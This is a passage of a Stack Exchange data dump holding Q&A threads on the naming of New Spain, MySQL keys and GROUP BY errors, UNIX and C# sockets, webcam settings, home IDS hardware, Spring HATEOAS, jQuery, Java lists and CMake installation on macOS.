tag in SSR mode with SvetleKit","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why was the Spanish kingdom in America called New Spain if Spain didn't exist as a country back then?\n\nQuestion: When the conquistadores arrived in America, the territory of current Spain was divided into multiple crowns\/kingdoms but it wasn't what we know today as Spain. I understand at that moment the territory was ruled by the crown of Castile and Aragon but still, each kingdom was working as an independent state.\nSo my question is why did Hernan Cortes name the territory in America \"New Spain\" if there wasn't an \"Old Spain\" to begin with?\nComment: Spain as the territory of the Iberian Peninsula was called Espanna\/Spanya\/Spania since the 12th century, as you can read in the Cr\u00f3nica de San Juan de la Pe\u00f1a and in the works of Bernat Desclot and Ramon Muntaner. And that without considering the Visigothis use of Hispania for the name of their domains.\nComment: I feel the underlying misunderstanding here is that \"regions of the world\" and \"government\" (and, relatedly, nationality) were not always as tightly linked as they are now. Spain as a geographical region existed long before Spain as a national country.\nComment: @CarlosMartin, not to mention it *also* being the name of the Roman province, which is an important factor in nomenclature there. In fact, across Europe there's several states that hark back to the names of Roman provinces in their names: not only Spain, but Britain and Italy as well. Not to mention (in many languages), the names of Syria, Egypt, Libya, and Palestine:\nComment: [Documenting preliminary research will improve both the probability of an answer and the quality of the answer(s)](https:\/\/history.meta.stackexchange.com\/a\/785\/26786) What's wrong with the answer in [Wikipedia](https:\/\/en.wikipedia.org\/wiki\/Spain) (referenced above by C. Martin). This is an example of an interesting historical blind spot - modern national identities obscure the complexity of pre-modern intermingling of ethnic, governmental and proto-state identities. The terms we use today \"Spain\" can have quite different meanings as we go back in time.\nComment: [Related](https:\/\/history.stackexchange.com\/q\/63698\/17887)\nComment: Was it a kingdom? Spanish Wikipedia uses the term *virreinato*\nComment: @CarlosMartin So it wasn't until later that Portugal came to be considered to not be part of \"Spain\"?\nComment: @Accumulation Yes, the independence of Portugal is actually a fascinating subject. From the 9th to the early 12th centuries it was merely a county in the Kingdom of Leon. The first Portuguese king, Alfonso I, declared his independence after some decisive victories against the Muslims in the South of his new kingdom and reconquering a lot of territory. The common explanation is that the Portuguese didn't have much help from the rest of the Spanish kingdoms in these battles so a sort of nationalistic sentiment was born\nComment: @CarlosMartin In a sense, he declared independence after [defeating his mom](https:\/\/en.wikipedia.org\/wiki\/Battle_of_S\u00e3o_Mamede) in battle in 1128. Lisbon was [conquered](https:\/\/en.wikipedia.org\/wiki\/Siege_of_Lisbon) in 1147 with the help of English Crusaders. In any case, only [around 1300](https:\/\/en.wikipedia.org\/wiki\/Denis_of_Portugal#Administration), was Portuguese considered an official language. During the succession crises around 1385 and 1580, much of the Portuguese Nobility sided with Castile. Nationalism was for the working people.\nComment: People spoke about Italy (Italia) and Germany (Germania) long before those regions became unified countries, just as we today can speak about e.g. Scandinavia despite it not being a single country...\nComment: @Julio Bastido Cortez didn't name the Spanish territories in the New World \"New Spain\", he named some of them \"New Spain\", namely lands in Mexico. Eventually The Viceroyalty of New Spain included Mexico, the US Southwest, Central America, and the Philippines. The title of the Spanish monarch for all of the New World was \"King of the Indias, the Islands and Mainland in the Ocean Sea\"..\nAnswer: 'Spain' in the sense of 'Hispania', alluding to the Roman province, certainly existed as a concept at the time, even if the Kingdom didn't (yet). Indeed, there's several medieval Kings in the Iberian peninsula who used the title 'Imperator totius Hispaniae' (ie, 'Emperor of all Spain').\nSee, for example, the epitaph of Ferdinand I of Leon, who died in 1103:\n\nH. E. TUMULATUS FERNANDUS MAGNUS REX TOTIUS HISPANIAE. FILIUS SANCTII REGIS PIRENAEORUM ET TOLOSAE. ISTA TRANSTULIT CORPORA. SANCTORUM IN LEGIONE BEATI ISIDORI ARCHIEPISCOPI AB HISPALI VICENTIIMARTYRIS AB ABELA. ET FECIT ECCLESIAM HANC LAPIDEAM. QUAE OLIM FUERAT LUTEA, HIC PRAELIANDO FECIT SIBI TRIBUTARIOS OMNES SARRACENOS HISPANIAE ET CEPIT COLIMBRIAM, LAMEGO, VESEO, ET ALIAS. ISTE VI CEPIT REGNA GARSIAE ET VEREMUDI. OBIIT VI K. JANUARII. ERA MCIII.\n\nTranslated:\n\nHere is buried Ferdinand the Great, king of all Spain, son of Sancho king of the Pyrenees and Toulouse. He transferred to Le\u00f3n the holy bodies of Saint Isidore archbishop, from Seville, and of Vicente martyr, from Avila, and built this church of stone, which in another time was of mud. He made his tributaries, with arms, all the Saracens of Spain. He seized Coimbra, Lamego, Viseo and other places. He took by force the kingdoms of Garcia and Vermudo. He died on December 27, (the year) 1103.\n\nAnother example, Ferdinand III of Castile, who died in 1292 and is buried in Seville's Cathedral; note how \"ESPA\u00d1A\" is already written in its modern form, not in Latin:\n\nAQVI YAZE EL MVY ONDRADO HERNANDO, SE\u00d1OR DE CASTIELLA E DE TOLEDO, E DE LEON, E DE GALICIA, DE SEVILLA, DE CORDOVA, DE MVRCIA, DE IHAEN, EL QVE CONQVISSO TODA ESPA\u00d1A, EL MAS LEAL, EL MAS VERDADERO, EL MAS FRANCO, EL MAS ESFORZADO, EL MAS APVESTO, EL MAS GRANADO, EL MAS ZOFRIDO, EL MAS HOMILDOSO, EL QVE MAS TEMIE A DIOS, EL QVE MAS LE FACIE SERVICIO, EL QVE QVEBRANTO E DESTRVYO A TODOS SVS ENEMIGOS, EL QVE ALZO, E ONDRO TODOS SVS AMIGOS, E CONQVISSO LA CIVDAD DE SEVILLA, QVE ES CABEZA DE TODA ESPA\u00d1A, E PASSO EN EL POSTRIMERO DIA DE MAYO, EN LA ERA DE MIL E CC. E NOVAENTA\n\nTranslated:\n\nHere lies the most noble Ferdinand, lord of Castile and of Toledo, and of Leon, and of Galicia, of Seville, of Cordoba, of Murcia, of Jaen, the one who conquered all Spain, the most loyal, the most true, the most frank, the most hardworking, the most handsome, the most distinguished, the most suffered, the most humble, the one who feared God most, who did Him most service, who broke and destroyed all his enemies, who raised up, and honored all his friends, and conquered the city of Seville, which is the head of all Spain, and passed on the last day of May, in the year of one thousand and two hundred and ninety.\n\nSo Spain being a concept in the 1500s shouldn't be all that surprising.\nIn exactly the same way 'Britain' (ie, Britannia), and 'Italy' were also concepts, even though a Kingdom of Great Britain wouldn't exist until 1707, and a unified Kingdom of Italy encompassing the entire peninsula wouldn't exist until 1861\/70.\nComment: \"[A] unified Kingdom of Italy encompassing the entire peninsula wouldn't exist until 1861\/70.\" -- that is not exactly true. The Ostrogothic Kingdom was called *Regnum Italiae*, and it included the whole peninsula.\nComment: Would Emperor Charles V (for whom Cortes was working) have been styled \"King of Spain\" at the time, or would he have been known to his contemporaries as King of Castile and King of Aragon distinctly? (His Wikipedia page styles him as \"King of Spain\", but I can't tell if that's an anachronism.) -- I think implicit in the question is why Cortes chose \"New Spain\" rather than, e.g., \"New Castile\".\nComment: @Riwen there also were the medieval kingdom of Italy (later part of the HRE, then defunct) and the Napoleonic kingdom of Italy, even though neither controlled the entire peninsula. The related concept did definitely exist. Similarly, the medieval kingdom of Germany, which just got subsumed into the HRE.\nComment: @JulioBastida they called themselves castellanos, gallegos, etc. But during the 13th-15th centuries, both Castille and Aragon annexed several other kingdoms and, for example, the King of Castille was automatically the King of Leon, the King of Navarre, the King of Galicia and several other kingdoms that had to share a king. With the marriage of the Catholic Monarchs in 1469, the kingdoms of Castille and Aragon got joined under the name of Kings of Spain. Only on paper: their grandson, Carlos I (V for most of the world) had to be recognized as King of Castille and after that, King of Aragon.\nComment: @CarlosMartin Until the first Bourbon dissolved the Cortes de Arag\u00f3n, centralized everything (like in France) and created the red-yellow flag inspired by the Aragonese Senyera to compensate the Crown of Arag\u00f3n for its loss of power.\nComment: @R.M. Charles I in Spain\nComment: @R.M. exactly my point, does it mean people back then where referring themselves as Spanish already?\nComment: @R.M.; the title 'King\/Queen of Spain' wasn't formally used until the reign of Isabel II; although Joseph Bonaparte had, briefly, used the title. Until then, the titles used were 'King\/Queen of Castile, Aragon\u2026', etc.\nComment: r.e.: Britain\/Britannia, my understanding is that is the name of the *island*, currently containing the countries of England, Scotland, and Wales, which along with Northern Ireland and a few smaller islands form the UK, etc. But the name \"Britain\" is geographical, not political. The equivalent for Spain might be Iberia (though that also includes Portugal).\nComment: @DarrelHoffman You might find [this](https:\/\/books.google.com\/ngrams\/graph?content=Iberia%2CHispania&year_start=1500&year_end=2019&corpus=en-2019&smoothing=3) interesting\nComment: @RodrigodeAzevedo Not sure how - Google ngrams simply represent *usage* over time, but not the official terminology. Just as many citizens of the UK might refer to themselves as \"British\" rather than \"English\", \"Scottish\", or \"Welsh\". Or those in the US call themselves \"Americans\" despite that being 2 whole continents and not just one country. It is interesting though that there does seem to be a small spike in \"Iberia\" at the 1500-end of the chart - shame the data doesn't go back any earlier... \"Iberia\" definitely dominates most of the timeline if you change the corpus to Spanish though.\nComment: @user22453 King Ferdinand I of Leon died in Anno Domini 1065, not 1103. 38 years later. HIs tomb gives his death year in the era of Spain or Era of the Caesars, counting the years from 38 BC. His son Alfonso VI was actually the monarch in 1103. The tomb of Ferdinand III says 1290 not 1292, and he actually died in AD 1252.\n","meta":{"source":"history.stackexchange","title":"Why was the Spanish kingdom in America called New Spain if Spain didn't exist as a country back then?","dup_signals":{}},"subset":"stackexchange"} +{"text":"MySQL items of an order without primary key?\n\nQuestion: i have two tables in my database which belongs to each other.\nmp_order and mp_order_items.\nmp_order has the main informations of an order of a customer like adress, date etc.\n(order_id, customer_company, customer_name, customer_adress, order_date, ... [etc.])\nmp_order_items has the priducts\/items which was ordered\n(order_id, item_id, item_qty)\nDue to order_id and item_id can repeat (but not in combination) i cant set one column as primary key.\nShould i implement another column as unique identifier for the single entries or is it valid to have a table without primary key?\nComment: Set both order_id and item_id as primary key, eg.`Primary key(item_id, order_id)`\nAnswer: Since, you requirement is that <code>order_id<\/code> and <code>item_id<\/code> can not repeat in combination meaning: (ord_134, itm_123) can't repeat itself then, I believe you need to create a COMPOSITE KEY.\n<code>PRIMARY KEY(order_id, item_id)<\/code>\nBasically, a combination of both Order Id and Item Id is what will uniquely identify a record in the table.\nThere is a caveat, if required, while defining a FOREIGN KEY, you can't link the tables using just order_id. You will need to include all the columns that are part of the COMPOSITE KEY inside the FOREIGN KEY relation.\nAnswer: You have two options:\n\nDefine a primary key on <code>(order_id, item_id)<\/code>\nDefine a synthetic primary key, such as an auto-incremented column.\n\nI prefer the second method. It is more flexible for the future:\n\nPerhaps an order could contain the same items, but with different pricing or shipping addresses or shipping times.\nThe rows are uniquely defined with a single number, which makes it easier to find them if you need to modify rows in the future.\nThe rows are more easily referenced in another table, for instance, if you had a returns table or if the items.\n\nOf course, having a composite primary key also works and is a very viable method for implementing the logic as well.\n","meta":{"source":"stackoverflow","title":"MySQL items of an order without primary key?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bidirectional communication using a single UNIX socket\n\nQuestion: I have the situation where a service running in the background makes itself available for ASCII-based commands via a socket (SOCK_DGRAM) placed on the file system. I am able to successfully send commands to this interface but cannot receive any response generated by the background service. \nAs I understand it, the reason I am not receiving the service's response is because the underlying IPC is not technically between two processes, but is rather between to addresses. As such, it is necessary to bind my endpoint to a particular address location so the service knows were to send its response. However, the problem is that I do not want to pollute the directory space with too many additional socket files. \nThat is to say, I can make this work by simply doing something like: \n<code>struct sockaddr_un local;\nint len;\n\ns = socket(AF_UNIX, SOCK_DGRAM, 0);\nlocal.sun_family = AF_UNIX;\nstrcpy(local.sun_path, \"\/path\/to\/some\/dir\/mySocketFile\");\nlen = strlen(local.sun_path) + sizeof(local.sun_family);\nbind(s, (struct sockaddr *)&local, len);\n\/\/Send commands to control interface of background service\n<\/code>\nAnd all is well, because by binding to mySocketFile the service has an address to which is will respond.\nIn short, is there a way to communicate to the service through its available socket interface and receive the response without binding the local endpoint such that it creates another socket-type file on the file system? i.e. some kind of a nameless socket, of sorts? \nOf course, if anyone spots any misconceptions or misunderstandings in my logic please point them out.\nComment: does this help? http:\/\/stackoverflow.com\/questions\/3324619\/unix-domain-socket-using-datagram-communication-between-one-server-process-and\nComment: @Dinesh, Yep, the top answer at that link expresses basically what I thought was the cause with this. Essentially, the client *and* the server both require endpoints for proper communication - so each must have *bound* to a particular socket interface. I was asking this question to see if there was a possible method where the client does not generate this endpoint, but rather uses some kind of nameless socket that is not visibly created on the file system.\nAnswer: If the client does not bind its socket to an filesystem address, it still has a notional address assigned by the system (which may exist in the filesystem in \/tmp somewhere, or may not exist in the filesystem at all, depends on the OS). The server can get this address by using the recvfrom(2) call to receive the incoming packets from clients -- this call takes additional sockaddr * and socklen_t * arguments that it fills in with the client socket address. You then use sendto(2) to send the reply back to the client.\nComment: Is this implicit address created with a call to `sendto` or `connect`?\nComment: I realized what the problem was: the service does not have appropriate permissions to write to the address I provide it with for a response. If I explicitly specify where I want the socket file to be generated (i.e. with `bind`) then I can `chmod` and I am able to successfully receive the server's responses, but otherwise I cannot. As such, if I do not `bind` and allow the OS to create a temporary address then the permission issue is still a problem. Is there any way around this?\nComment: I thought this would be the case, but perhaps I am misusing the socket utilities. I am able to successfully send commands to the service, but by `recvfrom` blocks infinitely and never returns. I am certain the forward communicate is reaching the service because I command to shutdown behaves as expected.\nComment: If the `recvfrom` is blocking, then you're obviously not getting the commands in the server, because it is the `recvfrom` that gets to commands. If the service is getting the commands some other way then you're not using recvfrom.\nComment: I am not controlling the server listening for commands. What I mean was I am able to `sendto` my commands to the server (shutdown, for example), and the server's response is as expected (i.e. a shutdown). However, the server should respond with a status to the command; it is this response that I do not receive at the client. The server is actually a background service that I am communicating with, not anything I built or maintain.\nComment: If the server is not sending responses back to your client, there's no way to change that without modifying the server. It sounds like your server is set up to receive commands only.\nComment: I know it sends responses, I am just not getting them for some reason. When I first started working on this I was able to get it working, but refactored the code and must be neglecting a step. To clarify, I have `connect`ed to the server's socket made available on the file system. I then simply `send` to the server and then `recv` on the same socket.\n","meta":{"source":"stackoverflow","title":"Bidirectional communication using a single UNIX socket","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to disable automatic white balance from Webcam?\n\nQuestion: I got a webcam and I'm running some algorithm on the received images to find movements in it.\nBut, the automatic auto white balance is changing the excepted result of the pixels color variance.\nThat's why I'm trying to disable it.\nSome one knows a way to get the web can image with out this automatic color balance or disable it ?\nTks \nComment: I'm also having issues trying to disable the automatic image processing on my webcam. In lower light levels it can reduce the frame rate by up to 75% while it auto adjusts :-(\nAnswer: If you are on Linux, you can test disabling automatic white balance using the <code>uvcdynctrl<\/code> command line utility. This is not a permanent solution, since these settings are reset every time the webcam is disconnected from the computer. As of OpenCV 2.1, configuring white balance is not supported using <code>cv::VideoCapture::set()<\/code>. Assuming this is still the case in OpenCV 2.2, you will need to use another library to configure your webcam and capture frames.\nIf you on Linux, you can see an example of using direct Video4Linux (V4L) syscalls to do this in one of my Github projects.\nComment: In OpenCV 2.3 it's still not supported (http:\/\/opencv.itseez.com\/modules\/highgui\/doc\/reading_and_writing_images_and_video.html#videocapture-set)\nAnswer: In my case I found on driver two options that must be disabled, auto white exposure and auto white balance, I disable both of them and the image got as I needed. \nComment: How\/where did you disable it?\nComment: Directly on driver software.\n","meta":{"source":"stackoverflow","title":"How to disable automatic white balance from Webcam?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Power friendly home router, firewall, IDS\/IPS setup?\n\nQuestion: For those that like to manage their own firewall and run IDS\/IPS on their home networks, I'm curious - what are you using and is it power friendly?\nI used to have a shelf full systems doing various things, but moving a lot had me trim down and I'm currently just using an off the shelf home wifi router, and need something with more power. Ideally running Linux, would like to run Suricata or Snort on it, maybe in IDS mode. And with logging to a database - that could offload that to another machine.\nComment: IDS is worthwhile for anyone in IT Security, or even in IT - you can watch for odd traffic - which may help you in your day job; you are more likely to spot anomalies; and you are bound to have something sensitive on your network you want to protect.\nComment: What services are you running that you would need an IDS setup?\nAnswer: Have in the past used a MikroTik as router and firewall, and a Mini-ITX running Snort and some more intelligent filtering than the basic MikroTik box. Don't know what the total power consumption was, but they didn't even get warm.\nEasy to setup and they just work:-)\nComment: +1 for MikroTik - looks pretty good. Much cheaper than buying a Soekris box or a build your own VIA system.\nComment: Yeah - I hadn't heard of them until @RoryMcCune introduced me to them - Cisco-ish interface and commands, very simple to configure and quite fully featured little boxen.\nAnswer: You might want to check for Endian firewall community version, which as know is free and can be run in virtual machine.\nComment: Hi webcore - welcome to Security.SE. Once you have earned more rep you will be able to comment on other posts, but your 1st paragraph doesn't answer the question at all - the OP is not asking about mangle or the functionality so I have edited it out. For your 2nd paragraph, can you explain why running a virtual machine is power-friendly? Until you do, this doesn't answer the question.\nAnswer: Power friendly and powerful are hard to come by in cheap packages. It really depends on traffic workload. You may easily get away with some high end router (say ~$100) with OpenWRT. Check OpenWRT page for what models are supported. Get one with USB if you want to store more data on board or have a NAS handy.\nThe other option has already been mentioned - MikroTik. But that is a little bit more expensive and I have bad experience with MikroTik OS heavy customisation. It is some linux but it's highly proprietaty and there aren't many packages for it (ymmv).\nAnd then, of course, there's Turris Lite. If you're feeling hacky, you may even build one of your own. The hardware is open source and it runs OpenWRT :)\n","meta":{"source":"security.stackexchange","title":"Power friendly home router, firewall, IDS\/IPS setup?","dup_signals":{}},"subset":"stackexchange"} +{"text":"send array with socket C# winforms\n\nQuestion: how to send a array with socket like java 'outputstream'?\ncan u see any demos or example serialization ?\nI can send a simple text with socket to my client. But how can I send array, List or Class to my client. I want to send this format\nList array;\nComment: http:\/\/stackoverflow.com\/questions\/21510204\/c-sharp-tcpclient-send-serialized-objects-using-separators\nAnswer: Java's <code>outputstream<\/code> can not do what you want either, all it can do is send <code>byte[]<\/code> which is exactly what C#'s socket classes do.\nIf you want to send complex objects you must use some form of \"Serializer\" which will let you transform your objects in to a <code>byte[]<\/code> to be sent out.\nA easy to use serializer that is built in to .NET is <code>XmlSeralizer<\/code>, this will produce a string that you can then feed in to a <code>StreamWriter<\/code> which will convert the string to a <code>byte[]<\/code> and write it out on to the socket. The other end would just use the reverse process using a <code>StreamReader<\/code>.\nIf you do not want to use that intermediate text step I would NOT recomend using <code>BinaryFormatter<\/code> like you see frequently on the internet, it is very \"fragil\" and having different levels of .NET Windows updates installed on both ends can end up breaking it. Instead I recommend using a 3rd party binary serializer like Protobuf-net\nComment: **thanks** there is json parser and serializer in c#?\nComment: @jjj [Yes there is](https:\/\/msdn.microsoft.com\/en-us\/library\/bb412179(v=vs.110).aspx) however most people consider the built in library not that great and most people ususally end up using [Newtonsoft's Json.NET](http:\/\/www.newtonsoft.com\/json), it is very easy to add to your project via [NuGet](http:\/\/blogs.msdn.com\/b\/dotnet\/archive\/2013\/10\/16\/nuget-is-a-net-framework-release-vehicle.aspx) just select [Newtonsoft.Json](https:\/\/www.nuget.org\/packages\/newtonsoft.json\/) from the [package manager console](http:\/\/docs.nuget.org\/consume\/package-manager-console)\n","meta":{"source":"stackoverflow","title":"send array with socket C# winforms","dup_signals":{}},"subset":"stackexchange"} +{"text":"@jsonRootName not working with spring boot starter hateoas\n\nQuestion: I am developing an rest application using spring-boot and using spring-Hateoas . And the DTO that i have written is:\nBill.java\n<code>@JsonIgnoreProperties(ignoreUnknown = true)\n@JsonRootName(\"bills\")\npublic class Bill{\n<\/code>\nDepedencies:\n<code>dependencies {\ncompile \"org.springframework.boot:spring-boot-starter-hateoas\"\ncompile \"org.springframework.boot:spring-boot-starter-ws\"\ncompile \"org.springframework.boot:spring-boot-starter-actuator\"\ncompile \"org.springframework.cloud:spring-cloud-starter-eureka:${springCloudVersion}\"\n\ntestCompile(\"org.springframework.boot:spring-boot-starter-test\")\n}\n<\/code>\nApplication.java:\n<code>@Configuration\n@Import(BillServiceConfig.class)\n@EnableAutoConfiguration\n@EnableEurekaClient\n@ComponentScan({\"com.billing\"})\n@EnableWebMvc\n@EnableHypermediaSupport(type = EnableHypermediaSupport.HypermediaType.HAL)\npublic class Application {\n<\/code>\nBillController.java:\n<code> @RequestMapping(method = RequestMethod.GET, value = \"\")\n public ResponseEntity<Resources<Resource<Bill>>> getBills(@PathVariable String billUid)\n<\/code>\nAnd the spring-boot version I am using is 1.2.2. The output that I am getting is\n<code>`_embedded: {\nBillList:\n{`\n<\/code>\nThe json Root name here is BillList. But I need it as \"bills\" instead of \"BillList\". Can anybody help out in this issue. Thanks in advance.\nAnswer: The keys within an <code>_embedded<\/code> clause are actually relation names. Hence, they're obtained though a <code>RelProvider<\/code> abstraction in Spring HATEOAS. The easiest way to customize them is by annotating the domain type with <code>@Relation<\/code> and define the relation names that you expect for item and collection relations.\nAn easy way to get correct plurals used in the <code>_embedded<\/code> clause is by adding the Evo Inflector JAR to your classpath as documented here.\nComment: I'm looking for an example of how to use the `@Relation` annotation and the Evo Inflector JAR to get the `_embedded` clause setup correctly in my response. Do you know of any examples that show how to do this?\n","meta":{"source":"stackoverflow","title":"@jsonRootName not working with spring boot starter hateoas","dup_signals":{}},"subset":"stackexchange"} +{"text":"Jquery .load - get featured products (opencart) from index.php to index.html same domain\n\nQuestion: javascript is definately not one of my strong points and normally I get by quite well. however.\nwhat i have is (for purpose of information) site http:\/\/mystore.co.uk which by default will lead you to index.html as the home page.\nI then have index.php which is my opencart store.\non index.php i have a featured products module installed and what I wish to do is take that entire div and place it onto my index.html page. \nWhat is the javascript .load function script that I need to use to do this. I have been looking for an answer but I think I have propably overlooked it several times due to frustration and confusion. any help you can offer would be appreciated.\nThanks in advance. \nComment: have you tried using a hidden iframe?\nComment: I havn't is the simple answer\nComment: You could also create a hidden div, and use jQuery.load() function to load the data into there, and then use a selector to pull out the div.\nComment: Just to clarify - these two pages are on the same domain. so there is no need for curl.php as far as I am aware.\n\nIf you could be kind enough to write out the code I would need to use for that, it would be a great help\nComment: Ok, thats good, but you can do this all client side. Try the ajax first. The solution I provided above with the hidden div\nComment: Try my solution below. I think you should be good.\nComment: @AlexShilman: If there is a problem with a post, please describe the problem in detail, instead of just posting \"what have you tried\". See [this Meta post](http:\/\/meta.stackexchange.com\/a\/172760\/152134) on whether \"what have you tried\" comments are acceptable and alternatives to \"what have you tried\". Thanks!\nAnswer: Give this a try, Assuming #yourhiddenDiv is in index.html and #yourdiv is the one you want to fetch from index.php, and both files are on the same domain:\n<code>$('#yourhiddenDiv').load('index.php #yourdiv').hide().fadeIn('slow');\n<\/code>\nComment: they are the same domain yes. and this has helped immensly - thank you\n","meta":{"source":"stackoverflow","title":"Jquery .load - get featured products (opencart) from index.php to index.html same domain","dup_signals":{}},"subset":"stackexchange"} +{"text":"I am getting an error 1055 trying to group after a join\n\nQuestion: I am new to SQL and I am having trouble with finding out how to group after a join. The goal is to find out what country raised the most.\n<code>SELECT x.country_id\n , x.pledged\n , y.id\n , y.name \n FROM campaign x\n LEFT \n JOIN country y\n ON x.country_id = y.id\n<\/code>\nThis brings up the columns required and it's all fine\nWhen I add:\n<code>GROUP BY country.name\n<\/code>\nor\n<code>GROUP BY campaign.country_id\n<\/code>\nI get an error that I don't understand.\n\nError Code: 1055. Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'kickstarter.campaign.country_id' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by\nComment: This is a faq. Please before considering posting read your textbook and\/or manual & google any error message or many clear, concise & precise phrasings of your question\/problem\/goal, with & without your particular strings\/names & site:stackoverflow.com & tags; read many answers. If you post a question, use one phrasing as title. Reflect your research. See [ask] & the voting arrow mouseover texts.\nAnswer: The basic rule for \"group by\" is that the column that has been selected has to either be applied with aggregated function or it has shown up after the group by. Try the below one, where we are trying to sum up all the pledged money for each country.\n<code>SELECT country.name, sum(campaign.pledged) country_pledged\nFROM campaign LEFT JOIN country ON campaign.country_id = country.id\nGROUP BY country.name ORDER BY campaign.pledged DESC\n<\/code>\nComment: Isaac sorry to be a hassle but i have one more question I'm stuck on, I need to see the top performing categories. can you spot anything wrong with this query, I have tried a lot of varients. I used your above answer and got this. SELECT country.name, sum(campaign.pledged) country_pledged\nFROM campaign LEFT JOIN country ON campaign.country_id = country.id\nGROUP BY country.name\nAnswer: You need to either group by all columns (like <code>GROUP BY campaign.country_id, campaign.pledged, country.id, country.name<\/code>) or use aggregate functions in SELECT list.\nComment: Hmm, this does not make the country name or id columns stack so that i can see who raised the most money it just leaves the table the same as before.\nAnswer: Below SQL should work. Please note your GROUP BY and SELECT clause should be in sync for aggregation to work.\n<code>SELECT country.name, count(1) ccount \nFROM campaign LEFT JOIN country ON campaign.country_id = country.id\nGROUP BY country.name ORDER BY 2 DESC \n<\/code>\n","meta":{"source":"stackoverflow","title":"I am getting an error 1055 trying to group after a join","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set and Get Nested List Element into a single list\n\nQuestion: I want to set some elements in an ArrayList as this format.\n[ 1, 2, [3, 4], 5, [6, 7, 8], 9]\nAnd I also try to get elements from the above format and it should convert all nested element list into a single element list.\ne.g. [1, 2, 3, 4, 5, 6, 7, 8, 9]\nCurrently, I am trying to set elements in my list.\n<code> List<Object> list = new ArrayList<>();\n List<Integer> intList = new ArrayList<>();\n List<Integer> intList2 = new ArrayList<>();\n\n intList.add(3);\n intList.add(4);\n\n intList2.add(6);\n intList2.add(7);\n intList2.add(8);\n\n list.add(1);\n list.add(2);\n list.addAll(intList);\n list.add(5);\n list.addAll(intList2);\n list.add(9);\n<\/code>\nAfter execution of above code in debug mode. I checked the list and it's storing element as this [1, 2, 3, 4, 5, 6, 7, 8, 9] instead of this [ 1, 2, [3, 4], 5, [6, 7, 8], 9].\nComment: don't use `addAll()` when adding the `intList` and `intList2`\nComment: Did you read the documentation for the `addAll` method?\nComment: addAll appends all elements from intList to end of list, i.e. list.addAll(intList1) is like individually adding each element from intList1 to end of list\nComment: You need to create nested `List` object that should look like `List> lists`, and add to it your `list`, `intList` and `intList2`\nComment: I changed my addAll() method into add() method and now my list storing the elements in this format [ 1, 2, [3, 4], 5, [6, 7, 8], 9].\nComment: you need to maintain input order or need the sorted list? i will suggest go for recursive @ManishVerma\nComment: @Deadpool i need sorted list.\nComment: check my updated code, first combine everything into single list and then sort it @ManishVerma\nComment: @Deadpool thanks sir.\nAnswer: <code>addAll()<\/code> method just add items from parameter list to origin one one by one. So you need regular <code>add()<\/code> method:\n<code>...\nlist.add(intList);\nlist.add(5);\nlist.add(intList2);\n...\n<\/code>\nThen if you want to convert it to single list you can use stream <code>flatMap<\/code> method. Note: since you have <code>List<Object><\/code> casting is needed: \n<code>List<Integer> collect = list.stream()\n .flatMap(o -> {\n if (o instanceof ArrayList)\n return ((ArrayList<Integer>) o).stream();\n return Stream.of((Integer)o);\n })\n .collect(toList());\n\nSystem.out.println(collect);\n<\/code>\nOr use <code>List<List<Integer>><\/code> instead of <code>List<Object><\/code> how it was mentioned in comments. Then the second part will be more concise\nAnswer: You can change the type of list from <code>List<Object><\/code> to <code>List<List<Integer>><\/code> if you want to operate on Integers, and then add List of Integers to list instead of single Integer, to access create a stream out of list and flatMap.\n<code>List<List<Integer>> list = new ArrayList();\nList<Integer> intList = new ArrayList();\nList<Integer> intList2 = new ArrayList();\n\nintList.add(3);\nintList.add(4);\n\nintList2.add(6);\nintList2.add(7);\nintList2.add(8);\n\nlist.add(Arrays.asList(1));\nlist.add(Arrays.asList(2));\nlist.add(intList);\nlist.add(Arrays.asList(5));\nlist.add(intList2);\nlist.add(Arrays.asList(9));\n\nList<Integer> flatList = list.stream().flatMap(List::stream).collect(Collectors.toList())\n<\/code>\n","meta":{"source":"stackoverflow","title":"Set and Get Nested List Element into a single list","dup_signals":{}},"subset":"stackexchange"} +{"text":"cmake installer for Mac fails to create \/usr\/bin symlinks\n\nQuestion: Try to install CMake cmake-184.108.40.206-Darwin64-universal.dmg on OS X 10.9.3\nI removed the old version from Application folder and delete ccmake, cmake, cmake-gui etc in usr\/bin.\nBut get \"Failed create symlink installation may be incomplete: \/usr\/bin\/cpack\" and other error messages.\nPlease let me know if any suggestion or question.\nThank you for precious time on my question.\nComment: You normally need root access for installations on Macs... I suggest you do `su` and enter the root password and then repeat the installation if it is Terminal-driven.\nComment: Thanks, Mark. I tried to install cmake dmg from the command line by following this link.\nhttp:\/\/apple.stackexchange.com\/questions\/73926\/is-there-a-command-to-install-a-dmg\nBut GOT \"Error trying to locate volume at \/Applications\/\"\nCan I have one more suggestion? Thank you!\nComment: I think @ComicSansMS has made a great suggestion, run `ls -l \/usr\/bin | grep -i cmake` and remove all the links with `sudo rm \/usr\/bin\/something`. Then re-try installing, but edit your question and update it with all the outputs you see so folks can assist you.\nComment: Sorry for the late update. With @ComicSansMS 's suggestion (remove all the links), then installation works!. Thank you ComicSansMS and Mark Setchell\nComment: Try this solution explained in this thread :\n\nhttp:\/\/stackoverflow.com\/questions\/13442096\/cmake-2-8-10-installation-for-mac-os-x-fails-creating-symlinks\nAnswer: CMake 3.0 does not seem to come with an installer any longer. So I ran into a similar issue. Like @ComicSansMS said you need to first remove the symlinks using <code>sudo rm<\/code>. Then you can run the gui with\n<code>sudo \/Applications\/CMake.app\/Contents\/MacOS\/CMake<\/code> and use the Tools -> Install For Command Line Use menu item.\nFrom some new 3.x version you have to use this command to create symlinks:\n<code>sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\n<\/code>\nNote option in menu now gives only this instruction and other possible choices.\nComment: This way worked for me. It seems like must use sudo to run it. It didn't work when I ran it from the Applications.\nComment: Really helpful! If the question hadn't asked specifically about v. 220.127.116.11 I would have suggested updating by making this the answer. Thanks.\nAnswer: In the latest versions the install procedure is simple, in the terminal simply type:\n<code>sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\n<\/code>\nAnd the soft links will be automatically generated.\nTested with <code>cmake version 3.3.2<\/code> and <code>cmake version 3.8.0<\/code>\n\nIf you fear you might have remaining links from a previous version you can remove them before installing the new version:\n<code>cd \/usr\/bin; sudo rm ccmake cmake cmake-gui cmakexbuild cpack 